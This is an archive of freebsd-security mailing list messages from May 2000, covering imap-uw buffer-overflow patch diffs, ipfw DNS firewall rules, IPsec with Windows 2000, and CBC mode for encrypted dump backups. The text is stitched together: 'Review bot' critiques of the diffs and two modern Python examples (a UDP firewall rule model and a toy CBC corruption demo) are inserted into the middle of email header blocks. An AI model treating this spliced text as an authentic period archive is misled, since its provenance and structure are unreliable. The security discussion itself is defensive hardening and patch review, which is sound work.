From owner-freebsd-security Sun May 7 1:26:20 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id B4F5A37B6AA; Sun, 7 May 2000 01:26:08 -0700 (PDT) (envelope-from ady@warpnet.ro)
Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id LAA12112; Sun, 7 May 2000 11:29:28 +0300 (EEST) (envelope-from ady@warpnet.ro)
Date: Sun, 7 May 2000 11:29:27 +0300 (EEST)
From: Adrian Penisoara
To: Kris Kennaway
Cc: Warner Losh, security-officer@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: port update: mail/imap-uw from 4.7c1 to 4.7c2
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

On Sat, 6 May 2000, Kris Kennaway wrote:

> On Sat, 6 May 2000, Adrian Penisoara wrote:
>
> > The author released yet another small update which fixes additional
> > buffer overflows in dummy.c and env_unix.c in src/osdep/unix.
>
> I didn't get the chance to look at this port yet, but given the above I'm
> inclined to keep the port FORBIDDEN for a while longer and give the author
> time to finish fixing whatever other security holes he can find. The only
> question is really how hard he's going to look for them.
>
> The alternative is reissuing advisories every time saying "whoops, the
> imap-uw port is insecure again".."now it's fixed".."oops, it's still
> insecure"
>
> Comments?

You've got a point here; besides these fixes are pretty weird, just look at these diffs between 4.7c1 and 4.7c2:

diff -ru imap-4.7c1/src/osdep/unix/dummy.c imap-4.7c2/src/osdep/unix/dummy.c --- imap-4.7c1/src/osdep/unix/dummy.c Thu Oct 7 23:29:30 1999 +++ imap-4.7c2/src/osdep/unix/dummy.c Wed May 3 20:34:29 2000
@@ -263,9 +263,10 @@ dummy_listed (stream,'/',dir,LATT_NOSELECT,contents); /* scan directory, ignore . and .. */ if (!dir || dir[strlen (dir) - 1] == '/') while (d = readdir (dp)) - if ((d->d_name[0] != '.') || - (d->d_name[1] && (((d->d_name[1] != '.') || d->d_name[2]) && - strcmp (d->d_name+1,MXINDEXNAME+2)))) { + if (((d->d_name[0] != '.') || + (d->d_name[1] && (((d->d_name[1] != '.') || d->d_name[2]) && + strcmp (d->d_name+1,MXINDEXNAME+2)))) && + (strlen (d->d_name) <= NETMAXMBX)) { /* see if name is useful */ if (dir) sprintf (tmp,"%s%s",dir,d->d_name); else strcpy (tmp,d->d_name); diff -ru imap-4.7c1/src/osdep/unix/env_unix.c imap-4.7c2/src/osdep/unix/env_unix.c --- imap-4.7c1/src/osdep/unix/env_unix.c Thu Jan 20 22:12:55 2000 +++ imap-4.7c2/src/osdep/unix/env_unix.c Wed May 3 20:33:01 2000 @@ -660,9 +660,15 @@ { char tmp[MAILTMPLEN]; if (dir || name) { /* if either argument provided */ - if (dir) strcpy (tmp,dir); /* write directory prefix */ + if (dir) { + if (strlen (dir) > NETMAXMBX) return NIL; + strcpy (tmp,dir); /* write directory prefix */ + } else tmp[0] = '\0'; /* otherwise null string */ - if (name) strcat (tmp,name);/* write name in directory */ + if (name) { + if (strlen (name) > NETMAXMBX) return NIL; + strcat (tmp,name); /* write name in directory */ + } /* validate name, return its name */ if (!mailboxfile (dst,tmp)) return NIL; } 
@@ -682,7 +688,8 @@ char *dir = myhomedir (); *dst = '\0'; /* default to empty string */ /* check invalid name */ - if (!name || !*name || (*name == '{')) return NIL; + if (!name || !*name || (*name == '{') || (strlen (name) > NETMAXMBX)) + return NIL; /* check for INBOX */ if (((name[0] == 'I') || (name[0] == 'i')) && ((name[1] == 'N') || (name[1] == 'n')) &&

I wonder if we'll see any s* functions replaced with sn* counterparts; or maybe this is about compatibility between Unix versions?

Hmmm, shouldn't it be the time for an OpenIMAPd project to appear ? ;-)...

Ady (@freebsd.ady.ro)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 7 1:38:26 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id 6A5EF37B87C; Sun, 7 May 2000 01:38:18 -0700 (PDT) (envelope-from ady@freebsd.ady.ro)
Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id LAA12357; Sun, 7 May 2000 11:41:30 +0300 (EEST) (envelope-from ady@freebsd.ady.ro)
Date: Sun, 7 May 2000 11:41:30 +0300 (EEST)
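Review bot: In the dummy.c hunk (@@ -263,9 +263,10 @@) of the diff above, the new `strlen (d->d_name) <= NETMAXMBX` test bounds only the directory entry name, while the very next statement writes both strings with `sprintf (tmp,"%s%s",dir,d->d_name)`. Nothing in the visible lines limits `strlen (dir)` or the sum of the two lengths against the size of `tmp`, so the copy remains only as safe as whatever the caller guarantees about `dir`. Compare the combined length with the size of `tmp` before the sprintf/strcpy pair and skip the entry when it does not fit, and say in a comment which bound `dir` is assumed to meet.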
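Review bot: In the first env_unix.c hunk (@@ -660,9 +660,15 @@), `dir` and `name` are each limited to NETMAXMBX but are then joined in `tmp[MAILTMPLEN]` by strcpy followed by strcat, so the string written can be twice NETMAXMBX long. The change is sound only if MAILTMPLEN is larger than 2*NETMAXMBX, which these lines neither show nor assert. Test `strlen (dir) + strlen (name)` once against `sizeof (tmp)` before either copy, so the check is stated in terms of the buffer that is actually written.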
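Review bot: In the second env_unix.c hunk (@@ -682,7 +688,8 @@), the added `strlen (name) > NETMAXMBX` rejection is the third hand-written copy of the same limit in this patch, and the size of `dst`, the buffer it is meant to protect, is not visible here. Put the length test in one helper used by all three call sites and document in the function comment how large `dst` must be. Also note that strlen can only reject a name that is still NUL-terminated within its own buffer, so whichever caller fills `name` needs its own bound before this function is reached.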
From: Adrian Penisoara
X-Sender: ady@ady.warpnet.ro
To: Warner Losh
Cc: Kris Kennaway, security-officer@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: port update: mail/imap-uw from 4.7c1 to 4.7c2
In-Reply-To: <200005062225.QAA66596@harmony.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 6 May 2000, Warner Losh wrote:

> In message Kris Kennaway writes:
> : The alternative is reissuing advisories every time saying "whoops, the
> : imap-uw port is insecure again".."now it's fixed".."oops, it's still
> : insecure"
>
> No. Let's mark it insecure. Let's continue to update it with buffer
> overflow fixes as they happen. If we go for a whole month without
> getting any new ones, then we'll reevaluate then.
>
> In the mean time, we don't update the imap advisory beyond "it is
> broken, has a poor track record and runs at elevated privs. It is
> being disabled until such time as it can be trusted again." and let
> the author whine all he wants.
>

Forgive me for redundancy, but doesn't OpenIMAPd sound good enough for a new and useful project ?

Thanks,
Ady (@freebsd.ady.ro)

From owner-freebsd-security Sun May 7 5:19:40 2000
Delivered-To: freebsd-security@freebsd.org
Received: from shell.r4k.net (r4k.net [194.109.74.200]) by hub.freebsd.org (Postfix) with ESMTP id 3407C37B528 for ; Sun, 7 May 2000 05:19:35 -0700 (PDT) (envelope-from _@shell.r4k.net)
Received: (from _@localhost) by shell.r4k.net (8.9.3/8.9.3) id OAA09975 for freebsd-security@freebsd.org; Sun, 7 May 2000 14:28:54 +0200 (CEST) (envelope-from _)
Date: Sun, 7 May 2000 14:28:54 +0200
From: Stephanie Wehner <_@r4k.net>
To: freebsd-security@freebsd.org
Subject: ipsec fbsd <-> win ?
Message-ID: <20000507142854.A9870@r4k.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

Does anyone have any experience concerning the interaction of the current freebsd ipsec and the ipsec for win2k as it's mentioned on the microsoft site ? Unfortunately I don't have any win2k around myself to test it.

Thanks, bye,
Stephanie

----------------------------<> _@r4k.net <>-----------------<> FreeBSD <>---
"I had to hit him -- he was starting to make sense."

From owner-freebsd-security Sun May 7 6:11:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from grimreaper.grondar.za (grimreaper.grondar.za [196.7.18.138]) by hub.freebsd.org (Postfix) with ESMTP id 7423637B530 for ; Sun, 7 May 2000 06:11:46 -0700 (PDT) (envelope-from mark@grondar.za)
Received: from grimreaper.grondar.za (localhost [127.0.0.1]) by grimreaper.grondar.za (8.9.3/8.9.3) with ESMTP id PAA18519; Sun, 7 May 2000 15:11:37 +0200 (SAST) (envelope-from mark@grimreaper.grondar.za)
Message-Id: <200005071311.PAA18519@grimreaper.grondar.za>
To: Marc Silver
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Firewall Rules
References: <20000505080928.Q80532@draenor.org>
In-Reply-To: <20000505080928.Q80532@draenor.org> ; from Marc Silver "Fri, 05 May 2000 08:09:28 +0200."
Date: Sun, 07 May 2000 15:11:37 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> I am currently working on some documentation on ipfw and natd with ppp.
> The following rules are for a basic dialup firewall that will allow
> connections on port 80. Are these rules sound, and if not, how could
> they be improved?

OK...

> fwcmd="/sbin/ipfw"
> $fwcmd -f flush
> $fwcmd add divert natd all from any to any via tun0

Depends on what you are doing with natd.

> $fwcmd add allow ip from any to any via lo0
> $fwcmd add allow ip from any to any via fxp0

OK. NP. Anyone internal can do anything.

> $fwcmd add allow tcp from any to any out xmit tun0 setup

Any outgoing TCP connections are accepted.

> $fwcmd add allow tcp from any to any via tun0 established

Any established TCP connections are OK. Works with above rule.

> $fwcmd add pass log tcp from any to any 80 setup

Allow incoming port 80.

> $fwcmd add reset log tcp from any to any 113 in recv tun0

Kill port 113 traffic and log it. So far, so good.

> $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0
> $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0
> $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0
> $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0

You want to allow DNS, and this will do it, but it will allow an
attacker to attack you by setting his source (ephemeral) port
to 53. Just be aware of this; there is probably not much you can
do with ipfw - you need a firewall that can hold UDP state.

Also - why the duplicates?

> $fwcmd add 65435 allow icmp from any to any

Allow ICMP. Why?

> $fwcmd add 65435 deny log ip from any to any

Kill everything else. Good.
M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun May 7 7:17: 1 2000
Delivered-To: freebsd-security@freebsd.org
Received: from polaris.shore.net (polaris.shore.net [207.244.124.105]) by hub.freebsd.org (Postfix) with ESMTP id CA61D37C115 for ; Sun, 7 May 2000 07:16:55 -0700 (PDT) (envelope-from tjlegg@shore.net)
Received: from eskimos.the-eleven.com [207.244.92.51] by polaris.shore.net with esmtp (Exim) id 12oRqZ-0006LG-00; Sun, 07 May 2000 10:15:51 -0400
Mime-Version: 1.0
X-Sender: tjlegg@shell2.shore.net
Message-Id:
In-Reply-To: <200005071311.PAA18519@grimreaper.grondar.za>
References: <20000505080928.Q80532@draenor.org> <200005071311.PAA18519@grimreaper.grondar.za>
Date: Sun, 7 May 2000 10:15:48 -0400
To: Mark Murray, Marc Silver
From: Tom Legg
Subject: Re: Firewall Rules
Cc: freebsd-security@freebsd.org
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 3:11 PM +0200 5/7/2000, Mark Murray wrote:
> > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0
> > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0
> > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0
> > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0
>
> You want to allow DNS, and this will do it, but it will allow an
> attacker to attack you by setting his source (ephemeral) port
> to 53. Just be aware of this; there is probably not much you can
> do with ipfw - you need a firewall that can hold UDP state.
>

True. So delete the second and fourth lines to eliminate the duplicates.

Then my first fix would be for the second line receiving dns replies.

    $fwcmd add allow udp from x.x.x.x 53 to any 1024-65535 in recv tun0

This at least removes probing of the privileged ports from a remote port 53. Of course you should check to see if you have any services running on unprivileged ports (databases or back orifice and the like are good examples) and deny external access to the ports that those services are listening on as well.

But if you are up for it, you might want to set up a simple DNS server on the machine running ipfw, insert your ISP's DNS servers in to the userland ppp.conf or in to /etc/resolv.conf, then point your internal machines to use the DNS off of the internal interface of the ipfw machine and tighten the above rule to be

    $fwcmd add allow udp from x.x.x.x 53 to ${oif} 1024-65535 in recv tun0

(${oif} is the outside interface, in this case tun0)

Now I've never played around with NAT, but with the original set of rules wouldn't you still need a line in the ipfw rules to xmit the incoming DNS responses via the inside interface? Or does NAT sort of bypass the interface restrictions of ipfw?
>--
>Mark Murray
>Join the anti-SPAM movement: http://www.cauce.org

--
-----
Tom Legg
tjlegg@shore.net
http://www.shore.net/~tjlegg/

From owner-freebsd-security Sun May 7 21:58:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 340BD37BC14; Sun, 7 May 2000 21:58:48 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA42850; Sun, 7 May 2000 22:58:47 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA75704; Sun, 7 May 2000 22:58:34 -0600 (MDT)
Message-Id: <200005080458.WAA75704@harmony.village.org>
To: Adrian Penisoara
Subject: Re: port update: mail/imap-uw from 4.7c1 to 4.7c2
Cc: Kris Kennaway, security-officer@FreeBSD.org, freebsd-security@FreeBSD.org
In-reply-to: Your message of "Sun, 07 May 2000 11:29:27 +0300."
References:
Date: Sun, 07 May 2000 22:58:33 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Adrian Penisoara writes:
: + if (!name || !*name || (*name == '{') || (strlen (name) > NETMAXMBX))

This one troubles me most. If name has already exceeded its buffer, then you may already be hosed. Actually, that might not be the whole story and this check is good (w/o looking at the source I don't know).

Warner

From owner-freebsd-security Mon May 8 1: 3:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from tld.follo.net (tld.follo.net [195.204.143.184]) by hub.freebsd.org (Postfix) with ESMTP id 900D737B5F5 for ; Mon, 8 May 2000 01:03:27 -0700 (PDT) (envelope-from terje@elde.net)
Received: by tld.follo.net (Postfix, from userid 1001) id D6B5E7D79; Mon, 8 May 2000 10:03:08 +0200 (CEST)
Date: Mon, 8 May 2000 10:03:07 +0200
From: Terje Elde
To: freebsd-security@FreeBSD.ORG
Subject: Re: ipsec fbsd <-> win ?
Message-ID: <20000508100307.C1302@tld.follo.net>
References: <20000507142854.A9870@r4k.net>
Mime-Version: 1.0
Content-Type: application/pgp; x-action=sign; format=text
Content-Disposition: inline; filename="msg.pgp"
User-Agent: Mutt/1.1.14i
In-Reply-To: <20000507142854.A9870@r4k.net>; from _@r4k.net on Sun, May 07, 2000 at 02:28:54PM +0200
X-Editor: Vim http://www.vim.org/
X-IRC: ircii!epic4-2000 - prevail[1214]
X-Goal: Exterminate All Rational Thought
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

* Stephanie Wehner (_@r4k.net) [000507 17:16]:
> Does anyone have any experience concerning the interaction of the current
> freebsd ipsec and the ipsec for win2k as it's mentioned on the microsoft
> site ? Unfortunately I don't have any win2k around myself to test it.

Chances are you'll have some problems until racoon is up and running. I must admit I have not checked the win2k version out as well as I should have, but assuming it's been implemented with just a bit of clue, it will not rely on the same encryption keys for a huge amount of time/data, and thus you'll need racoon for the dynamic keys. Unless I'm misunderstanding something that is.

You might want to try Maikel Verheijen's patched version, which he's made available at http://home.worldonline.nl/~maikel/racoon.tar.gz

Terje
- --
Terje Elde   | Yes Interactive AS | voice: +47 64 85 52 00
terje@yes.no | http://www.yes.no/ | fax: +47 64 85 52 01

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE5FnS78HLgLrwmRg0RAvP7AJ9O+ZDkp8D1aJZ1Bg3GCLBOTW23yQCgkJzo
dGxIM6NKbQNF+p7bZ6/whDI=
=phU4
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon May 8 4:23:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id B677537C37E for ; Mon, 8 May 2000 04:22:59 -0700 (PDT) (envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk ([192.168.192.2]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id JAA03564; Mon, 8 May 2000 09:37:22 GMT
Message-ID: <39168AD1.FD8BAC38@algroup.co.uk>
Date: Mon, 08 May 2000 10:37:21 +0100
From: Adam Laurie
X-Mailer: Mozilla 4.7 [en-gb] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Mark Murray
Cc: Marc Silver, freebsd-security@FreeBSD.ORG
Subject: Re: Firewall Rules
References: <20000505080928.Q80532@draenor.org> <200005071311.PAA18519@grimreaper.grondar.za>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mark Murray wrote:
> > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0
> > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0
> > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0
> > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0
>
> You want to allow DNS, and this will do it, but it will allow an
> attacker to attack you by setting his source (ephemeral) port
> to 53. Just be aware of this; there is probably not much you can
> do with ipfw - you need a firewall that can hold UDP state.

this works with ipfw:

    # block low port incoming UDP but allow outgoing and replies for DNS, NTP
    # (and anything else that needs it).
    $fwcmd add pass udp from any to any 53,123
    $fwcmd add deny udp from any to any 0-1023,1110,2049
    $fwcmd add pass udp from any to any

1110 & 2049 are blocked to protect NFS - you will need to block any other high ports that you have real services running on.

cheers,
Adam
--
Adam Laurie
Tel: +44 (181) 742 0755
A.L. Digital Ltd.
Fax: +44 (181) 742 5995
Voysey House
Barley Mow Passage
http://www.aldigital.co.uk
London W4 4GB
mailto:adam@algroup.co.uk
UNITED KINGDOM
PGP key on keyservers

From owner-freebsd-security Mon May 8 13:48: 3 2000
Delivered-To: freebsd-security@freebsd.org
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 7741D37BC34 for ; Mon, 8 May 2000 13:47:57 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee)
Received: from localhost (narvi@localhost) by haldjas.folklore.ee (8.9.3/8.9.3) with SMTP id WAA05304; Mon, 8 May 2000 22:47:31 +0200 (EET) (envelope-from narvi@haldjas.folklore.ee)
Date: Mon, 8 May 2000 22:47:31 +0200 (EET)
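The three UDP rule sets posted in the "Firewall Rules" thread above (the original DNS rules, Tom Legg's 1024-65535 tightening, and Adam Laurie's low-port block), evaluated against constructed packets. This is an added example, not code from any poster: it is a simplified first-match model rather than ipfw itself, and the addresses standing in for x.x.x.x, the dial-up host and the unrelated remote host are assumptions.

```python
"""Simplified first-match model of the stateless UDP rules quoted in this thread.
It is not ipfw: it understands only
    ACTION udp from SRC [PORTS] to DST [PORTS] [in|out] [recv|xmit|via IFACE]
and falls through to "deny", as the last rule of the posted rule set does."""

RESOLVER = "192.0.2.53"   # constructed stand-in for the x.x.x.x DNS server
HOST = "198.51.100.7"     # constructed address of the dial-up machine on tun0
OTHER = "203.0.113.9"     # constructed unrelated remote host
OPTION_WORDS = {"in", "out", "recv", "xmit", "via"}


def parse_ports(spec):
    """'0-1023,1110,2049' -> [(0, 1023), (1110, 1110), (2049, 2049)]"""
    ranges = []
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        ranges.append((int(lo), int(hi or lo)))
    return ranges


def parse_rule(text):
    tok = text.replace("x.x.x.x", RESOLVER).split()
    if len(tok) < 6 or tok[0] not in ("allow", "pass", "deny") \
            or tok[1] != "udp" or tok[2] != "from":
        raise ValueError("unsupported rule: " + text)
    rule = {"action": "deny" if tok[0] == "deny" else "allow",  # pass == allow
            "src": tok[3], "sports": None, "dports": None,
            "direction": None, "iface": None}
    i = 4
    if tok[i] != "to":                       # optional source port list
        rule["sports"] = parse_ports(tok[i])
        i += 1
    if tok[i] != "to":
        raise ValueError("expected 'to' in: " + text)
    rule["dst"] = tok[i + 1]
    i += 2
    if i < len(tok) and tok[i] not in OPTION_WORDS:   # optional dest port list
        rule["dports"] = parse_ports(tok[i])
        i += 1
    while i < len(tok):
        if tok[i] in ("in", "out"):
            rule["direction"] = tok[i]
            i += 1
        elif tok[i] in ("recv", "xmit", "via") and i + 1 < len(tok):
            rule["iface"] = tok[i + 1]
            i += 2
        else:
            raise ValueError("unsupported option in: " + text)
    return rule


def matches(rule, pkt):
    def addr_ok(spec, addr):
        return spec in ("any", addr)

    def port_ok(ranges, port):
        return ranges is None or any(lo <= port <= hi for lo, hi in ranges)

    return (addr_ok(rule["src"], pkt["src"]) and port_ok(rule["sports"], pkt["sport"])
            and addr_ok(rule["dst"], pkt["dst"]) and port_ok(rule["dports"], pkt["dport"])
            and rule["direction"] in (None, pkt["direction"])
            and rule["iface"] in (None, pkt["iface"]))


def verdict(ruleset, pkt):
    """First matching rule wins; nothing remembers earlier packets (no state)."""
    for text in ruleset:
        rule = parse_rule(text)
        if matches(rule, pkt):
            return rule["action"]
    return "deny"


RULESETS = {
    "original": ["allow udp from any to x.x.x.x 53 out xmit tun0",
                 "allow udp from x.x.x.x 53 to any in recv tun0"],
    "tightened": ["allow udp from any to x.x.x.x 53 out xmit tun0",
                  "allow udp from x.x.x.x 53 to any 1024-65535 in recv tun0"],
    "low_port_block": ["pass udp from any to any 53,123",
                       "deny udp from any to any 0-1023,1110,2049",
                       "pass udp from any to any"],
}


def udp(src, sport, dst, dport, direction):
    return {"src": src, "sport": sport, "dst": dst, "dport": dport,
            "direction": direction, "iface": "tun0"}


# Constructed packets. The two "sport 53" entries answer no query: they only
# carry the resolver's address and source port 53, which is all a stateless
# rule can look at.
PACKETS = {
    "query to resolver": udp(HOST, 40000, RESOLVER, 53, "out"),
    "reply to that query": udp(RESOLVER, 53, HOST, 40000, "in"),
    "sport 53 to portmap 111": udp(RESOLVER, 53, HOST, 111, "in"),
    "sport 53 to NFS 2049": udp(RESOLVER, 53, HOST, 2049, "in"),
    "stranger to high port 6000": udp(OTHER, 4000, HOST, 6000, "in"),
}


def audit():
    return {name: {label: verdict(rules, pkt) for label, pkt in PACKETS.items()}
            for name, rules in RULESETS.items()}


if __name__ == "__main__":
    for name, row in audit().items():
        print(name)
        for label, result in row.items():
            print(f"  {result:5}  {label}")
```

Each rule set trades one exposure for another: the tightened rule still admits source-port-53 datagrams to a high-port service such as NFS on 2049, while the low-port block closes 2049 but admits any source to any unlisted high port.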
From: Narvi
To: Mark Murray
Cc: "Andrew J. Korty", security@FreeBSD.ORG
Subject: Re: Cryptographic dump(8)
In-Reply-To: <200005042015.WAA07617@grimreaper.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 4 May 2000, Mark Murray wrote:

> > I was under the impression that the CBC mode would also propagate this
> > entry throughout the block. Must I use one of the feedback modes?
>
> Yes. I have no hard references in front of me, but I'll put ${bodypart}
> on a block that CBC is 8-bytes-at-a-time-with-same-key-each-time. IE not
> good enough to stave off known plaintext attacks. CBC is what you'd use
> if the entire plaintext is of unpredictable structure.
>

Another thing to consider (and I am yet to see it in this discussion):

Say a block relatively in the beginning of the dump gets read off the tape corrupted. Any encryption scheme in which such means that the entire dump is worthless is less than satisfactory in most environments.

Losing the entire backup to the chaining mode just because one block reads incorrectly is a bad idea. Known plaintext attacks - more exactly *chosen plaintext* attacks are imho unavoidable in backups. They must be fought in some other way. WO backups are no good.

If we use CBC, we should restart it with a new IV on every block boundary or so to minimise damage.

> M
> --
> Mark Murray
> Join the anti-SPAM movement: http://www.cauce.org
>

Sander

From owner-freebsd-security Mon May 8 20:22:42 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 10A1C37BC1E; Mon, 8 May 2000 20:22:41 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA51434; Mon, 8 May 2000 20:22:40 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Mon, 8 May 2000 20:22:40 -0700 (PDT)
From: Kris Kennaway
To: Narvi
Cc: Mark Murray, "Andrew J. Korty", security@FreeBSD.ORG
Subject: Re: Cryptographic dump(8)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 8 May 2000, Narvi wrote:

> Losing the entire backup to the chaining mode just because one block reads
> incorrectly is a bad idea. Known plaintext attacks - more exactly *chosen
> plaintext* attacks are imho unavoidable in backups.

See my reply :)

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue May 9 6: 6:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from winschoten.vuurwerk.nl (winschoten.vuurwerk.nl [194.178.232.122]) by hub.freebsd.org (Postfix) with SMTP id 9FC4737BE36 for ; Tue, 9 May 2000 06:06:15 -0700 (PDT) (envelope-from petervd@vuurwerk.nl)
Received: (qmail 23235 invoked from network); 9 May 2000 13:06:09 -0000
Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by winschoten.vuurwerk.nl with SMTP; 9 May 2000 13:06:09 -0000
Received: (qmail 42538 invoked by uid 11109); 9 May 2000 13:06:09 -0000
Mail-Followup-To: security@freebsd.org
Date: Tue, 9 May 2000 15:06:09 +0200
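What one corrupted ciphertext block costs under CBC, first with a single chain over the whole dump and then with the chain restarted under a new IV per record as proposed in the "Cryptographic dump(8)" messages above. This is an added example, not code from the thread: the small Feistel cipher is a toy standing in for a real 8-byte block cipher, and KEY, record_iv and the record length of 4 blocks are assumptions.

```python
import hashlib

BLOCK = 8                                        # bytes per cipher block
KEY = b"constructed demo key"                    # constructed, not a real key
PLAIN = [bytes([i]) * BLOCK for i in range(8)]   # constructed 8-block "dump"


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def round_fn(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def encrypt_block(key, blk):
    """Toy 4-round Feistel permutation; for illustration only."""
    left, right = blk[:4], blk[4:]
    for rnd in range(4):
        left, right = right, xor(left, round_fn(key, rnd, right))
    return left + right


def decrypt_block(key, blk):
    left, right = blk[:4], blk[4:]
    for rnd in reversed(range(4)):
        left, right = xor(right, round_fn(key, rnd, left)), left
    return left + right


def cbc_encrypt(key, iv, blocks):
    out, prev = [], iv
    for plain in blocks:
        prev = encrypt_block(key, xor(plain, prev))
        out.append(prev)
    return out


def cbc_decrypt(key, iv, blocks):
    out, prev = [], iv
    for cipher in blocks:
        out.append(xor(decrypt_block(key, cipher), prev))
        prev = cipher
    return out


def record_iv(key, index):
    # Assumption made so the example is deterministic: a real tool would
    # store a random IV alongside each record.
    return hashlib.sha256(b"iv" + key + index.to_bytes(4, "big")).digest()[:BLOCK]


def encrypt_dump(key, blocks, record_len):
    """CBC restarted with a fresh IV every record_len blocks."""
    out = []
    for start in range(0, len(blocks), record_len):
        iv = record_iv(key, start // record_len)
        out += cbc_encrypt(key, iv, blocks[start:start + record_len])
    return out


def decrypt_dump(key, blocks, record_len):
    out = []
    for start in range(0, len(blocks), record_len):
        iv = record_iv(key, start // record_len)
        out += cbc_decrypt(key, iv, blocks[start:start + record_len])
    return out


def damaged_blocks(key, plain, record_len, bad_index):
    """Flip one bit in one ciphertext block and list the plaintext blocks lost."""
    cipher = encrypt_dump(key, plain, record_len)
    bad = cipher[bad_index]
    cipher[bad_index] = bytes([bad[0] ^ 0x01]) + bad[1:]
    recovered = decrypt_dump(key, cipher, record_len)
    return [i for i, (a, b) in enumerate(zip(plain, recovered)) if a != b]


if __name__ == "__main__":
    print("one chain over the dump :", damaged_blocks(KEY, PLAIN, len(PLAIN), 3))
    print("restart every 4 blocks  :", damaged_blocks(KEY, PLAIN, 4, 3))
```

With one chain the flipped bit costs the block it hits and the block after it; with the restart, damage to the last block of a record stops at the record boundary.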
From: Peter van Dijk
To: security@freebsd.org
Subject: envy.vuurwerk.nl daily run output
Message-ID: <20000509150609.L42267@vuurwerk.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
